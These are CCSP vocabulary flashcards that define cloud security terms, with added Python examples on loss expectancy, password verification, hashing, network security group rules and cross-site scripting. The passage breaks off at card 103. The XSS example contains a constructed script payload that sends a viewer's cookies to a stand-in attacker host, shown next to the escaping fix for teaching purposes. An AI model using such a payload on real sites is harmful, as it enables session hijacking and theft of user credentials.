CCSP Vocabulary Flashcards

1
Q

ALE : Annualized Loss Expectancy

A

ALE = SLE * ARO

Formula for estimating the yearly cost of a risk the organization has chosen to accept: if the vulnerability in question is exploited by an attacker, ALE is the dollar amount the organization should expect to lose to that risk over a year, averaged over how often the loss event is expected to occur.

The ALE equals the single loss expectancy (SLE) multiplied by the annualized rate of occurrence (ARO).

The SLE = asset value * exposure factor

Exposure factor describes the proportion of the asset's value that is lost as a result of the attack (expressed as a percentage of value lost) – e.g. if an asset will be wholly lost in an attack, the exposure factor is 100%; if 30% of its value will be lost, the exposure factor is 30%, etc.

2
Q

API : Application Programming Interface

A

A set of functions, routines, tools, or protocols for building applications.

APIs are leveraged by developers to save time and increase consistency, because the API offers a set of working programmatic methods for building connectivity without bespoke code.

At issue for the cloud security professional is that an API only describes function; its existence says nothing about how well it authenticates callers, authorizes each operation, validates input, or limits abuse. Each of these has to be verified (and, for a provider's API, contractually and technically assured) rather than assumed.

3
Q

ARO : Annualized Rate of Occurrence

A

An estimate of how many times a given threat event (the successful exploitation of a vulnerability, or the realization of a loss) is expected to occur within a year – e.g. if two laptops are stolen each month, the ARO for laptop theft is 2 * 12 = 24 per year.

ARO is an element of the ALE calculation:
ALE = SLE * ARO
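The ALE, SLE and ARO cards above are a small calculation, so here it is carried through in code. This is an added example, not part of the original flashcards: the laptop asset value, exposure factor, control cost and post-control theft rate are constructed figures, and the "two laptops stolen a month" rate is the one from the ARO card. The cost-benefit function at the end is the standard use of ALE for deciding whether a control is worth buying; the card itself does not spell that step out.

```python
"""Annualized Loss Expectancy, worked through with the deck's own formulas:
SLE = asset value * exposure factor, ARO = expected occurrences per year,
ALE = SLE * ARO.

Added example, not part of the original flashcards. The laptop figures
(asset value, exposure factor, control cost, post-control theft rate) are
constructed for illustration; the "two laptops stolen a month" rate is the
one used on the ARO card.
"""


def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = asset value * exposure factor; EF is a fraction (1.0 = total loss)."""
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("exposure factor must be between 0.0 and 1.0")
    return asset_value * exposure_factor


def annualized_rate_of_occurrence(events: float, period_months: float = 12) -> float:
    """ARO: scale an observed or estimated event count up to a 12-month rate."""
    if period_months <= 0:
        raise ValueError("period must be positive")
    return events * (12 / period_months)


def annualized_loss_expectancy(sle: float, aro: float) -> float:
    """ALE = SLE * ARO, the expected loss per year from accepting this risk."""
    return sle * aro


def control_is_justified(ale_before: float, ale_after: float, annual_control_cost: float) -> bool:
    """Standard cost-benefit use of ALE (not spelled out on the card): a control
    pays for itself when the ALE it removes exceeds its own yearly cost."""
    return (ale_before - ale_after) > annual_control_cost


def laptop_theft_example() -> dict:
    """Two laptops stolen per month, each a total loss of a $2,000 asset (all
    figures constructed). A hypothetical control costing $10,000/year is
    assumed to cut thefts to six a year."""
    sle = single_loss_expectancy(asset_value=2000.0, exposure_factor=1.0)
    aro = annualized_rate_of_occurrence(events=2, period_months=1)
    ale = annualized_loss_expectancy(sle, aro)
    ale_with_control = annualized_loss_expectancy(sle, annualized_rate_of_occurrence(6))
    return {
        "sle": sle,
        "aro": aro,
        "ale": ale,
        "ale_with_control": ale_with_control,
        "control_justified": control_is_justified(ale, ale_with_control, 10000.0),
    }


if __name__ == "__main__":
    for key, value in laptop_theft_example().items():
        print(f"{key}: {value}")
```

With these inputs the SLE is $2,000, the ARO is 24, and the ALE is $48,000 a year; a control that cuts thefts to six a year removes $36,000 of expected loss, so a $10,000 control is justified and a $40,000 one is not. The same arithmetic is what an examiner expects on the "should we buy this control" question.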

4
Q

auditability

A

The ability to capture, analyze, and report on any and all events that happen within a system or application: data access and modification, user actions and processes, the operation of controls, and evidence of regulatory and contractual compliance.

5
Q

authentication

A

The process of comparing credentials presented by a user, application, or service against verification data that the authentication system previously issued or recorded for that identity. For passwords, what is stored should be a salted, slow hash (a verifier) rather than the password itself, so that a breach of the credential store does not hand out working credentials.

e.g. A user is issued an email address and password when provisioned to the system; later the user presents that email address and password, the system recomputes the hash and compares it with the stored verifier, and if they match and the account is still valid (not disabled or expired) the user is authenticated. Authentication establishes who the caller is; what the caller may then do is authorization.
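The provision-then-match flow on this card, as an added example that is not part of the original flashcards. The user record and password are constructed, and the account store is an in-memory dict standing in for a real directory or database. It shows the three details the card leaves implicit: the stored value is a salted PBKDF2 verifier rather than the password, the comparison is constant-time, and a disabled account fails even with the right password.

```python
"""Credential verification as described on the authentication card, with the
stored "known values" being salted, slow hashes (verifiers), not passwords.

Added example, not part of the original flashcards. The user record and
password are constructed; the dict is a stand-in for a real account store.
"""
import hashlib
import hmac
import os
from typing import Dict, Optional

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (OWASP 2023 guidance)


def make_verifier(password: str, salt: Optional[bytes] = None, iterations: int = ITERATIONS) -> dict:
    """Derive the stored verifier for a password. The salt is random per user, so
    identical passwords produce different records and precomputed tables fail."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "iterations": iterations, "hash": digest, "enabled": True}


def provision_user(store: Dict[str, dict], email: str, password: str) -> None:
    """Issue credentials: the system records a verifier, never the password."""
    store[email.strip().lower()] = make_verifier(password)


def disable_user(store: Dict[str, dict], email: str) -> None:
    """Mark the credentials as no longer valid (leaver, lockout, expiry)."""
    store[email.strip().lower()]["enabled"] = False


# Verifier for a password nobody has, so a lookup of an unknown account costs
# the same as a real one and does not leak which addresses exist (timing).
_DUMMY = make_verifier("not-a-real-password")


def authenticate(store: Dict[str, dict], email: str, password: str) -> bool:
    """Compare the presented credentials with the stored verifier in constant
    time. True only if the hash matches and the account is still valid."""
    record = store.get(email.strip().lower(), _DUMMY)
    presented = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), record["salt"], record["iterations"]
    )
    matched = hmac.compare_digest(presented, record["hash"])
    return matched and record["enabled"] and record is not _DUMMY


def demo() -> dict:
    """Walk the card's scenario: provision, correct login, wrong password,
    unknown user, then the same correct password after the account is disabled."""
    store: Dict[str, dict] = {}
    provision_user(store, "Alice@Example.com", "correct horse battery staple")
    results = {
        "valid": authenticate(store, "alice@example.com", "correct horse battery staple"),
        "wrong_password": authenticate(store, "alice@example.com", "Tr0ub4dor&3"),
        "unknown_user": authenticate(store, "bob@example.com", "correct horse battery staple"),
    }
    disable_user(store, "alice@example.com")
    results["disabled"] = authenticate(store, "alice@example.com", "correct horse battery staple")
    return results


if __name__ == "__main__":
    print(demo())
```

Only the first case succeeds. Note that the store never holds anything an attacker could replay directly, and that the `record is not _DUMMY` guard matters: without it, presenting the dummy password for a nonexistent address would be accepted.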

6
Q

authorization

A

The process of granting or denying privileges within a system, network, or application after successful authentication has been performed; these privileges (such as read, write, execute) are drawn from an approved, constrained set of permissions enforced by a policy or rule set.

7
Q

backdoor

A

Backdoors can be created by developers or hackers: A backdoor is a method of accessing a system that bypasses the normal (“official”) authentication and authorization processes.

Backdoors can be unauthorized methods that are discovered by malicious actors to get into a system, or they can be methods that are purposefully employed by developers or support staff to access systems for maintenance or other support activities.

8
Q

baseline

A

A baseline is a constrained configuration standard, or a point-in-time snapshot, that represents a known good system state.

Baselines are often employed in change management to establish a "gold image" (the baseline configuration of a workstation), or as a fall-back option ("we will patch the system and roll back to the baseline if patching causes availability issues"). Drift away from the baseline is itself a signal worth detecting and alerting on.

9
Q

big data

A

Refers to the collection, processing, and analysis of data sets that are so large that traditional data processing and analysis tools are inadequate to properly handle them.

The concept of ‘big data’ is often applied outside of this formal definition to reference predictive analysis and user analytics of data sets.

10
Q

BYOD : Bring Your Own Device

A

The practice of allowing employees of an organization to use their personally owned computers, phones, tablets, or other electronic resources to access the computing resources of the firm, rather than using IT provided and supported devices.

11
Q

business continuity

A

The capability of an organization to continue the operation of systems or applications at a predetermined level after an incident or disruption of service.

Business continuity encompasses the full range of possible service disruptions and how a company can minimize, mitigate, and respond to them and keep business operations running, available, and secure.

i.e. BC is a day-to-day operational discipline, not only a plan invoked after a disaster.

12
Q

BIA : Business Impact Analysis

A

A structured methodology for identifying the risks and threats that could disrupt operations or services and for evaluating the likely extent of the impact and disruption, so that recovery priorities and objectives (RTO and RPO) can be set for each business process.

13
Q

chain of custody

A

The formal documentation showing the chronological control and disposition of physical or electronic evidence.

This documentation includes creation, all changes of possession, and final disposition.

Note that a break in the chain of custody does not automatically make evidence inadmissible: any evidence with probative value may still be offered to the court, and gaps generally go to the weight the court gives it. They do, however, invite challenges to the evidence's authenticity, which is why the documentation is kept.

14
Q

CAB : Change Advisory Board

A

A group that assists the change team and change management process by evaluating, prioritizing, and approving change requests.

15
Q

change manager

A

An individual who ensures that the change management process is properly executed; this person also directly handles low-level tasks related to the change process.

16
Q

cloud application

A

An application that is never installed on a local server or desktop but is instead accessed via a network or the Internet. A cloud application merges the functionality of a local application with the accessibility of a web-based application.

17
Q

CAMP : Cloud Application Management for Platforms

A

An OASIS specification for managing applications on PaaS platforms. CAMP defines a RESTful protocol for managing platform services, a model for describing and documenting the components that make up the platform, and the language for describing the platform as a whole, its components and services, and the metadata about them.

18
Q

cloud auditor

A

An auditor that is specifically responsible for conducting audits of cloud systems and cloud applications.

The cloud auditor is responsible for assessing the effectiveness of the cloud service and identifying control deficiencies between the cloud customer and the cloud provider, as well as the cloud broker if one is used.

19
Q

cloud backup

A

The process of using a cloud-based backup system, with files and data being sent over the network to a public or private cloud provider for backup, rather than running traditional backup systems within a data center.

20
Q

cloud backup service provider

A

An organization operating a public or private cloud service that offers backup services to the public or to organizational clients, either free of charge or under a pricing model based on the amount of data stored or the number of systems protected.

21
Q

cloud backup solutions

A

Services that run within a public or private cloud offering backup solutions – either through client-based software that does automatic or scheduled backups or through manual backups initiated by a user or system.

22
Q

cloud computing

A

A model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computer resources (e.g. networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.

This cloud model (the NIST SP 800-145 definition) is composed of five essential characteristics, three service models, and four deployment models.

Five (5) essential characteristics: on-demand self-service, broad network access, resource pooling, rapid elasticity, and measured service

Three (3) service models: IaaS, PaaS, and SaaS

Four (4) deployment models: community cloud, hybrid cloud, private cloud, and public cloud

23
Q

cloud computing reseller

A

An organization that sells and offers cloud services, and possibly cloud support services, to various organizations and works as a middleman between the cloud customer and cloud provider.

24
Q

CCM : Cloud Control Matrix

A

A formally published guide by the Cloud Security Alliance (CSA) that enables cloud customers to evaluate a prospective cloud provider in regard to its security posture. The CCM can also be used by cloud providers to structure its security program and services.

25
Q

cloud customer

A

An organization or individual that utilizes and consumes resources and services from a cloud provider. This can be in the form of free public services and systems or private and fee-based applications or solutions.

26
Q

cloud data portability

A

The ability to move data between cloud providers.

27
Q

cloud database

A

A database that is installed in a cloud environment and accessed via the network or the Internet by a user or application.

Because the database is being installed in a cloud environment instead of a typical server environment, elasticity, scalability, and high availability can be achieved and maximized.

28
Q

cloud deployment model

A

The cloud deployment models are public, private, hybrid, and community; these describe how the cloud service is delivered through a set of particular configurations and virtual resources.

29
Q

cloud enablement

A

The creation of a public cloud environment through the offering of services or infrastructure.

30
Q

cloud management

A

The oversight and operations management of a cloud environment by the cloud service provider, whether it is a public or private cloud environment.

31
Q

cloud migration

A

The process of moving services, systems, applications, or data from a traditional data-center hosting model into a cloud environment.

32
Q

cloud OS

A

Typically used to denote an operating system (OS) in a Platform as a Service (PaaS) implementation and to signify that the implementation is within a cloud environment.

33
Q

cloud provider

A

A service provider that makes storage or software applications available via the Internet or private networks to customers. Since they are offered as a service, the platform and underlying software, as well as operations and security systems, are maintained by the provider and abstracted from the customer.

34
Q

cloud provisioning

A

The process by which the cloud provider allocates resources to cloud customers based on their specific requests and requirements, such as the number of virtual machines and the compute, memory, storage, and network capacity each is to receive.

35
Q

CSA : Cloud Security Alliance

A

The most prominent and well-known organization to raise awareness of best practices for security within a cloud environment.

36
Q

cloud server hosting

A

The hosting and location of servers within a virtualized cloud environment, rather than the virtual or physical hosting that’s done in a traditional data center.

37
Q

cloud service

A

Capabilities offered via a cloud provider and accessible via a client.

38
Q

cloud service broker

A

A partner that serves as an intermediary between a cloud service customer and a cloud service provider.

39
Q

cloud service category

A

A group of cloud services that have a common set of features or qualities.

40
Q

cloud service partner

A

One that holds a relationship with either a cloud service provider or a cloud service customer to assist with cloud services and their delivery.

41
Q

cloud service user

A

One that interacts with and consumes services offered by a cloud service provider.

42
Q

cloud testing

A

The testing of systems, services, or applications by leveraging cloud platforms and resources to simulate the size and scale of real-world traffic and users.

43
Q

Common Criteria

A

A set of international guidelines and specifications for the evaluation of IT security resources to ensure those resources meet an agreed-upon set of security standards. The Common Criteria for Information Technology Security Evaluation is formalized as an international standard in ISO/IEC 15408.

44
Q

community cloud

A

A cloud infrastructure provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (for example, mission, security requirements, policy, or compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of these, and it may exist on or off premises.

45
Q

configuration management

A

The practice of establishing and maintaining consistency of a system's configuration throughout its lifecycle, based on its requirements and technical specifications, so that configuration controls, performance standards, and design requirements are met and any change to the approved configuration is controlled and recorded.

46
Q

container

A

A software package that bundles an application's code, configuration, and libraries into a single deployable unit that runs on a shared host kernel. Because containers on a host share that kernel, their isolation from one another is weaker than the isolation between virtual machines, so the host and the container runtime must be hardened accordingly.

47
Q

XSS : cross-site scripting

A

A web application vulnerability in which untrusted input is placed into a page without proper output encoding, allowing an attacker to inject client-side script that is then delivered to and executed in the browsers of other users. Because the injected script runs in the vulnerable site's own origin, the same-origin policy no longer protects that site's session cookies, tokens, and DOM from the attacker; the script acts with the victim's privileges on that site. The primary defence is context-appropriate output encoding of all untrusted data, with a Content Security Policy as defence in depth.
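The mechanism on this card in its smallest form, beside the fix. This is an added example, not part of the original flashcards; the page template and the attacker's comment are constructed, and the rendering is done in Python (the server side) rather than in a browser so that it runs stand-alone. The `page_executes_script` check is a deliberately crude stand-in for the browser's HTML parser, good enough to show why one version is exploitable and the other is not.

```python
"""Stored XSS: user-supplied text interpolated into HTML, with and without
output encoding for the HTML text context.

Added example, not part of the original flashcards. The template, the
attacker's payload and the parser stand-in are all constructed.
"""
import html
import re

# Constructed page template; {body} is where a user's comment is shown.
PAGE = '<html><body><h1>Comments</h1><div class="comment">{body}</div></body></html>'

# Constructed payload: exfiltrates the viewer's cookies to an attacker host.
ATTACKER_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(user_text: str) -> str:
    """Interpolates the input straight into the markup. A <script> tag in a
    comment becomes a <script> element in every viewer's page and runs in
    the site's origin, which is exactly what the same-origin policy cannot
    stop once the script is already part of the page."""
    return PAGE.format(body=user_text)


def render_comment_hardened(user_text: str) -> str:
    """Output-encodes for the HTML text context: < > & " ' become entities,
    so the browser displays the characters instead of parsing them."""
    return PAGE.format(body=html.escape(user_text, quote=True))


# Crude stand-in for the browser: would a <script> element be created?
_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def page_executes_script(rendered_html: str) -> bool:
    """True if the rendered page contains a live <script> opening tag."""
    return bool(_SCRIPT_TAG.search(rendered_html))


if __name__ == "__main__":
    print("vulnerable executes payload:", page_executes_script(render_comment_vulnerable(ATTACKER_COMMENT)))
    print("hardened executes payload:  ", page_executes_script(render_comment_hardened(ATTACKER_COMMENT)))
    print(render_comment_hardened(ATTACKER_COMMENT))
```

`html.escape` is the right encoder only for the HTML body and quoted-attribute contexts shown here; data placed into a JavaScript block, a URL, or a CSS value needs the encoder for that context, and a templating engine with auto-escaping enabled is the normal way to get this right everywhere rather than by hand.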

48
Q

DAR : Data at Rest

A

Data that resides on a system in persistent storage, such as disks, tapes, databases, or any other type of storage device.

49
Q

data dispersion

A

The feature of cloud storage where data is spread across data centers or wide geographic areas for redundancy and speed.

The degree of dispersion is typically based on the needs of the application and the level of service procured by the cloud customer.

50
Q

DIT : Data in Transit

A

Data that flows over a networked connection – either through public unsecured networks or internal protected corporate networks.

51
Q

DIU : Data in Use

A

Data within a system or application that is currently being processed or is in use – either through the computing resources or residing in memory.

52
Q

DLP : Data Loss Prevention

A

An overall strategy and process for ensuring that users cannot send sensitive or protected information outside of networks or systems that are secured and protected.

This can be related to the intentional attempt by users to transfer such information, but it also applies to preventing the accidental sending or leaking of data.

53
Q

data portability

A

The ability to easily move data from one system to another without having to re-enter it.

54
Q

DoS : Denial-of-Service attack

A

An attempt to make computing resources or a network unavailable to its intended users by denying legitimate traffic access totally or by degrading performance to unacceptable levels.

55
Q

direct identifiers

A

Information that specifically applies to a unique individual, such as name, address, phone number, e-mail address, or unique identifying numbers or codes.

56
Q

DRS : Distributed Resource Scheduler

A

A utility from VMware that balances computing demands and available resources within the virtualized environment.

57
Q

DAST : Dynamic Application Security Testing

A

The testing of an application while it is running, exercising it from the outside through its interfaces (as an attacker would) against live systems, applications, and networks, without requiring access to the source code; contrast with static testing of the code itself.

58
Q

DO : Dynamic Optimization

A

The process of moving and reallocating virtual machines and resources within a cluster environment to maintain optimal performance with balanced and distributed resource utilization.

59
Q

eDiscovery

A

The process of discovering and securing electronic data for use in criminal or civil legal cases.

60
Q

encryption

A

The process of encoding and securing data so that only authorized parties in possession of the correct information, credentials, or keys can access it.

61
Q

enterprise application

A

An application that runs on a large and distributed scale and is deemed mission critical to a company or an organization.

62
Q

enterprise cloud backup

A

A cloud-based backup and recovery service similar to those offered for personal use but scaled and focused on large-scale and organizational-level services.

63
Q

Eucalyptus :

Elastic Utility Computing Architecture for Linking Your Programs To Useful Systems

A

Free and open source software for building private and hybrid clouds whose interfaces are compatible with the Amazon Web Services (AWS) APIs, so that tools and workloads written for AWS can be run against them.

64
Q

event

A

An action or situation that is recognized by software and causes the software to respond or take action – i.e. any recordable activity.

65
Q

FRCP : Federal Rules of Civil Procedure

A

The set of rules and procedures that govern civil legal proceedings in the United States federal courts to provide uniformity and efficiency in resolving legal matters and proceedings.

66
Q

FRE : Federal Rules of Evidence

A

The set of rules governing what evidence may be admitted, and how it may be presented, in the United States federal courts, including the requirements for authenticating electronic records.

67
Q

federation

A

A group of organizations or IT service providers that interoperate on an agreed-upon set of standards and operations. In identity management, a federation lets users authenticate with their home identity provider and have that identity trusted by the other members' services (for example via SAML or OpenID Connect) instead of holding a separate account with each.

68
Q

FIPS 140-2

A

A United States federal government security standard for the validation of cryptographic modules, defining four increasing security levels. It has been superseded by FIPS 140-3, against which new validations are now performed.

69
Q

firewall

A

A network security control, implemented in hardware or software, that permits only the connections allowed by its rule set, based on attributes such as source and destination address, port, and protocol, and blocks all other inbound and outbound traffic.

70
Q

hashing

A

Hashing takes data of arbitrary type and length and applies a one-way mathematical function that maps it to a value of fixed size (the digest). Any change to the input produces a different digest, and a cryptographic hash function makes it infeasible to recover the input from the digest or to find two inputs that share one.

Hashing can be applied to virtually any type of data object: text strings, documents, images, binary data, and even virtual machine images, which is what makes it useful for verifying integrity and for storing password verifiers.
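The two properties the hashing card relies on, fixed-size output and sensitivity to any change in the input, as an added example that is not part of the original flashcards. The "image" is a constructed megabyte of bytes standing in for a real VM image or download, hashed in chunks the way you would hash something too large to hold in memory, and then checked against a published digest after a single bit is flipped.

```python
"""Hashing for integrity: fixed-size digests over inputs of any size, and the
verification step that follows from it.

Added example, not part of the original flashcards. The "image" bytes are a
constructed stand-in for a real VM image or software download.
"""
import hashlib
import hmac
from typing import Iterable, Iterator


def sha256_hex(data: bytes) -> str:
    """Hex digest of an in-memory blob; always 64 hex characters (256 bits)."""
    return hashlib.sha256(data).hexdigest()


def chunked(data: bytes, size: int = 65536) -> Iterator[bytes]:
    """Yield fixed-size slices, simulating reading a large file from disk."""
    for offset in range(0, len(data), size):
        yield data[offset:offset + size]


def hash_stream(chunks: Iterable[bytes], algorithm: str = "sha256") -> str:
    """Hash data of any size incrementally, without holding it all in memory."""
    h = hashlib.new(algorithm)
    for chunk in chunks:
        h.update(chunk)
    return h.hexdigest()


def verify_integrity(data: bytes, expected_hex: str) -> bool:
    """Recompute the digest and compare it with the published one in constant
    time (case-insensitive, since vendors publish both upper and lower case)."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def demo() -> dict:
    """Short string, a 1 MiB constructed image, and the image with one bit flipped."""
    short = b"hello"
    image = bytes(range(256)) * 4096          # 1 MiB of constructed "image" data
    tampered = bytearray(image)
    tampered[123456] ^= 0x01                  # flip a single bit somewhere inside
    published = sha256_hex(image)             # what a vendor would publish beside the download
    return {
        "short_digest": sha256_hex(short),
        "digest_len_short": len(sha256_hex(short)),
        "digest_len_image": len(published),
        "streamed_matches_whole": hash_stream(chunked(image)) == published,
        "original_verifies": verify_integrity(image, published),
        "tampered_verifies": verify_integrity(bytes(tampered), published),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Both digests are 64 hex characters regardless of input size, the chunked computation equals the one-shot computation, and flipping one bit of a megabyte fails verification. The digest you compare against must come from a source the attacker cannot also modify (a signed manifest, an out-of-band channel); a hash published next to the download it protects proves only that the two were not corrupted in transit together.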

71
Q

HIDS : Host Intrusion Detection System

A

An intrusion detection system running on an individual host that monitors that system's own resources (file integrity, logs, processes, configuration) for signs of malicious activity; a HIDS may also inspect the host's own network traffic.

72
Q

host

A

A computer that is connected to a network and provides computing services to either users or other hosts on the network.

73
Q

hybrid cloud

A

A cloud infrastructure composed of two or more distinct cloud infrastructures (private, community, or public) that remain unique entities but are bound together by standardized or proprietary technology enabling data and application portability (for example, cloud bursting for load balancing between clouds).

74
Q

hypervisor

A

A virtual machine manager that allows multiple virtual machines (guests) to run on the same physical host while keeping them isolated from one another.

A Type 1 (bare-metal) hypervisor runs directly on the hardware with no host operating system beneath it; a Type 2 (hosted) hypervisor runs as an application on top of a conventional host OS. In a multitenant cloud the hypervisor is the trust boundary between tenants, so its integrity and patching are of first-order concern.

75
Q

IdP : identity provider

A

A system responsible for determining the authenticity of a user or system, providing assurance to a service that the identity is valid and known, and possibly providing additional information about the identity of the user or system to the service provider requesting it.

76
Q

IDS : Intrusion Detection System

A

A device, appliance, or software implementation that monitors servers, systems, or networks for malicious activities.

77
Q

incident

A

An event that could potentially cause disruption to an organization’s systems, services, or applications.

78
Q

indirect identifiers

A

Information about an entity that cannot be used solely to identify that entity uniquely but can be used in combination with other data points to potentially do so; examples include place of birth, race, employment history, and educational history.

79
Q

IRM : Information Rights Management

A

A subset of digital rights management that is focused on protecting sensitive information from unauthorized exposure or use.

80
Q

IaaS : Infrastructure as a Service

A

The capability provided to a consumer to provision processing, storage, networks, and other fundamental computing resources in order to deploy and run arbitrary software, including operating systems and applications.

The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, and deployed applications – and possibly limited control of select networking components such as host firewalls.

81
Q

IoT : Internet of Things

A

Internet of things (IoT) refers to the extension of Internet connectivity to devices beyond traditional computing platforms. This can include home appliances, thermostats, sensors, lighting fixtures, and so on, and is very common within the scope of “smart home” technologies.

82
Q

interoperability

A

The ease and ability to reuse components of a system or application regardless of the underlying system design and provider.

83
Q

IPS : Intrusion Prevention System

A

A network-based appliance or software that examines network traffic for known exploits, or any attempts to use exploits, and actively stops them.

84
Q

ISO/IEC 27001 and 27001:2013

A

A formal specification for an information security management system (ISMS) against which an organization can be certified by an accredited body following a formal audit. ISO/IEC 27001:2013 was the current revision when this deck was written; it has since been superseded by ISO/IEC 27001:2022.

85
Q

ITIL : IT Infrastructure Library

A

A collection of papers and concepts that lay out a vision for an IT Service Management (ITSM) framework for IT services and user support.

86
Q

jurisdiction

A

The authority to exert regulatory and legal control over a defined area of responsibility. Jurisdictions can overlap between the local, state / province, and national levels.

87
Q

KMS : Key Management Service

A

A system or service that manages keys used for encryption within a system or application that is separate from the actual host systems.

The KMS will typically generate, secure, and validate keys.

88
Q

KPI : Key Performance Indicator

A

A metric that provides a quantitative value that can be used to evaluate how effectively key business requirements are being met.

89
Q

legal hold

A

The requirement to preserve, and to suspend the normal deletion of, data that is or may be relevant to pending or reasonably anticipated litigation, an investigation, or an official request from a legal authority; the hold overrides ordinary retention schedules until it is lifted.

90
Q

malware

A

A broad term that encompasses software, scripts, content, and executable code that takes the form of viruses, Trojan horses, ransomware, spyware, and other malicious programs that intend to steal information or computing resources.

91
Q

managed service provider

A

A provider that delivers and operates IT services on a customer's behalf, with the technology, software, and day-to-day operations selected and managed by the provider rather than by the customer or user.

92
Q

mapping

A

The process of aligning data values and fields with specific definitions or requirements.

93
Q

MTBF : Mean Time Between Failures

A

A measure of reliability: the average time (typically in hours) between failures of a hardware component.

94
Q

MTTR : Mean Time to Repair

A

The typical or average time to repair and recover after a hardware failure.

95
Q

measured service

A

Cloud services that are delivered and billed for in a metered way.

96
Q

metadata

A

Data that gives additional or descriptive information about other data. This can be in the form of structural data that pertains to how the information is stored and represented or descriptive data that contains information about the actual content of the data.

97
Q

mobile cloud storage

A

Cloud-based storage, typically used for mobile devices such as tablets, phones, and laptops, that enables the user to access their data from any network location and across multiple devices in a uniform way.

98
Q

MDM : Mobile Device Management

A

A system that allows a firm to manage and secure mobile devices that are granted access to the firm’s resources.

This is typically accomplished by installing software on a mobile device that allows the IT department to enforce security configurations and policies, regardless of whether it is owned by the organization or is a private device owned by the user.

99
Q

multitenancy

A

Having multiple customers and applications running within the same environment but in a way that they are isolated from each other and not visible to each other, while still sharing the same resources.

100
Q

network security group

A

A set of rules applied to network resources (for example a subnet or a virtual machine's network interface) to filter the traffic they send and receive. Each rule matches on direction of flow (inbound or outbound), source address, destination address, source and destination ports, and transport protocol, and either allows or denies matching traffic; rules are evaluated in priority order, and traffic matching none of them is denied by default.
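A minimal evaluator for the rule model on this card (direction, source, destination, both ports, protocol; priority order; default deny), as an added example that is not part of the original flashcards. The rule set and the sample flows are constructed and do not reproduce any particular provider's NSG format. The lint function at the end is the check a reviewer most often wants from such a rule set: inbound allow rules that open an administrative port to the whole Internet.

```python
"""Network security group evaluation: ordered rules, first match wins,
implicit deny, plus a lint for the classic misconfiguration.

Added example, not part of the original flashcards. Rules, addresses and
flows are constructed; the field layout is illustrative, not any vendor's.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple

ANY_PORT = (0, 65535)          # inclusive port range meaning "any"
ADMIN_PORTS = (22, 3389)       # SSH and RDP


@dataclass(frozen=True)
class Rule:
    priority: int              # lower number is evaluated first
    direction: str             # "inbound" | "outbound"
    protocol: str              # "tcp" | "udp" | "icmp" | "any"
    source: str                # CIDR
    dest: str                  # CIDR
    src_ports: Tuple[int, int] # inclusive range
    dst_ports: Tuple[int, int] # inclusive range
    action: str                # "allow" | "deny"
    name: str = ""


@dataclass(frozen=True)
class Flow:
    direction: str
    protocol: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def _in_range(port: int, port_range: Tuple[int, int]) -> bool:
    low, high = port_range
    return low <= port <= high


def _matches(rule: Rule, flow: Flow) -> bool:
    """All five match fields on the card must agree for a rule to apply."""
    if rule.direction != flow.direction:
        return False
    if rule.protocol != "any" and rule.protocol != flow.protocol:
        return False
    if ip_address(flow.src_ip) not in ip_network(rule.source, strict=False):
        return False
    if ip_address(flow.dst_ip) not in ip_network(rule.dest, strict=False):
        return False
    if flow.protocol in ("tcp", "udp"):   # only port-bearing protocols check ports
        return _in_range(flow.src_port, rule.src_ports) and _in_range(flow.dst_port, rule.dst_ports)
    return True


def evaluate(rules: List[Rule], flow: Flow) -> Tuple[str, Optional[str]]:
    """First matching rule in priority order decides; no match means deny."""
    for rule in sorted(rules, key=lambda r: r.priority):
        if _matches(rule, flow):
            return rule.action, rule.name
    return "deny", None


def find_overly_permissive(rules: List[Rule]) -> List[str]:
    """Lint: inbound allow rules exposing an admin port to 0.0.0.0/0."""
    flagged = []
    for rule in rules:
        if rule.action != "allow" or rule.direction != "inbound":
            continue
        if ip_network(rule.source, strict=False).prefixlen != 0:
            continue
        if any(_in_range(p, rule.dst_ports) for p in ADMIN_PORTS):
            flagged.append(rule.name)
    return flagged


# Constructed rule set: public HTTPS to a web subnet, SSH only from a bastion
# range, an explicit catch-all deny, and unrestricted egress.
SAMPLE_RULES = [
    Rule(100, "inbound", "tcp", "0.0.0.0/0", "10.0.1.0/24", ANY_PORT, (443, 443), "allow", "web-https"),
    Rule(200, "inbound", "tcp", "203.0.113.0/24", "10.0.1.0/24", ANY_PORT, (22, 22), "allow", "bastion-ssh"),
    Rule(4000, "inbound", "any", "0.0.0.0/0", "0.0.0.0/0", ANY_PORT, ANY_PORT, "deny", "deny-all-inbound"),
    Rule(100, "outbound", "any", "10.0.1.0/24", "0.0.0.0/0", ANY_PORT, ANY_PORT, "allow", "egress-any"),
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_RULES, Flow("inbound", "tcp", "198.51.100.7", 51000, "10.0.1.10", 443)))
    print(evaluate(SAMPLE_RULES, Flow("inbound", "tcp", "198.51.100.7", 51001, "10.0.1.10", 22)))
    print(find_overly_permissive(SAMPLE_RULES))
```

Internet HTTPS to the web subnet is allowed, Internet SSH falls through to the catch-all deny, bastion SSH is allowed, and an empty rule set denies everything. Adding a rule that allows TCP 3389 from 0.0.0.0/0 would pass evaluation happily, which is why the lint exists alongside the evaluator.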

101
Q

NIDS : Network Intrusion Detection System

A

A network-based sensor placed at strategic points on a network to monitor and analyze the traffic traversing that segment, comparing it against signatures of known attacks and vulnerabilities (and, in some products, against a baseline of normal behaviour).

102
Q

NIST SP 800-53

A

Titled “Security and Privacy Controls for Federal Information Systems and Organizations,” NIST SP 800-53 provides a set of security controls for all systems under the United States federal government, with the exception of systems dedicated to national security.

103
Q

nonrepudiation

A

